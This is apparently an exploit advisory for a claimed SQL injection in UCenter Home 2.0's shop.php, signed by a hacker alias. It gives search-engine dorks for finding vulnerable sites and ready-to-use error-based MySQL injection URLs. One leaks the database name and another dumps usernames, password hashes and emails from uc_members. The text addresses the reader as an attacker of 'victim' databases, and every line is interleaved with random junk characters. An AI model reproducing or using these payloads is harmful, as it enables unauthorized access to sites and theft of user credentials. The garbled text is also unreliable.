2 e; D& B+ K2 p/ X7 ]6 T( W$ {: Q__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
& |0 C2 O: c) }/ S8 x" ^) }% E" `# ~4 S. {
2 R' D( }2 o" ?6 Y7 h1 G T. b9 _2 w% h1 B
*/ Author : KnocKout
5 t" _3 T3 z" M( d4 w% i% c" V) B" N! c# v1 n3 M
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 7 a5 s3 a/ N6 N! K' _- p
& ]' t" C+ S+ Q, F6 a*/ Contact: knockoutr@msn.com
6 R5 e& i+ l1 ]6 Q C% f% H" S
* J/ |; M) h: X3 E% k6 V+ R*/ Cyber-Warrior.org/CWKnocKout
2 S; s3 W7 h8 U/ S; Y8 E
M2 [2 ^4 m' m7 Z__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; T& l$ {* K8 u* u Q0 _ R: f% d/ F
7 y+ R/ J6 V Z% E1 h4 s g; A, Q* BScript : UCenter Home
4 E0 o+ _+ P% N/ {
. }# z8 j; c! {8 |& U- J6 n5 G( u4 @0 GVersion : 2.0 ! U1 P. y/ G. Q& ^/ _4 w
0 q; c. w: T- @5 SScript HomePage : http://u.discuz.net/
& e9 l& K) n' }2 b1 r, O# V3 I- X E4 W6 t% E9 W
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ d+ C6 c9 z5 N
9 k" \+ ^% i0 i, s
Dork : Powered by UCenter inurl:shop.php?ac=view
+ T' W& N0 }0 c2 Q
+ x* m8 X$ _% ~7 Z5 a; m/ p$ u9 kDork 2 : inurl:shop.php?ac=view&shopid=
& l6 r2 p' T) S6 Z" x& }: H% Y* c7 e* S$ m d; g: C4 u8 y/ H/ X& j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ! N9 N0 K) W, @& q( l
2 u; F' B/ M- e2 e, m ~ `' U. YVuln file : Shop.php
+ f2 i% l' T' K2 A& r. A) K5 W9 `
6 R: L2 K) t0 j( M* hvalue's : (?)ac=view&shopid= 4 M$ G3 e9 ?% q- w
1 L! v. x# B& \
Vulnerable Style : SQL Injection (MySQL Error Based)
( @3 s$ C4 B7 F. W4 E+ G! M
. c/ l$ O# h2 t8 ONeed Metarials : Hex Conversion 0 Q" t5 r! N- e. |- B: o
+ ?. M% _. r- x6 E__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ h7 o8 d# U: Y- p4 h
/ @% j$ J0 q) C' E! aYour Need victim Database name.
5 G9 |- u5 r7 k- }5 }
- ^- P' k& g: h& l' R o% h1 l3 Zfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ) Y9 {- o- W! `! F6 b0 H
# L0 {; l7 U7 z5 U: [' P
..
4 f; a" Y. e* \' w% L3 E+ |7 Q0 ^6 e! G i7 [' ]
DB : Okey. 2 ?* i( A/ v$ z3 C7 [
5 _' Z9 X2 R3 V! {! t" T& _( b' L
your edit DB `[TARGET DB NAME]` ( i/ {6 [* A; I7 R7 M! n/ s
0 w W3 o+ ?6 n$ k4 D
Example : 'hiwir1_ucenter'
% S# O! A3 }$ y0 l* M
1 n8 t8 E+ v% m/ b/ [- }Edit : Okey.
8 a* d/ }% K* S+ }
?+ ?" t0 F4 A6 o P* XYour use Hex conversion. And edit Your SQL Injection Exploit..
/ ~( z H" I3 u# {
- Y) I. i8 l2 M% Z$ Q. S/ L
' ]. ]; m. M$ p
1 Y$ s$ j e1 a: Z5 f! W2 t) }Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 / R, m1 T, d3 h* k: u. t
|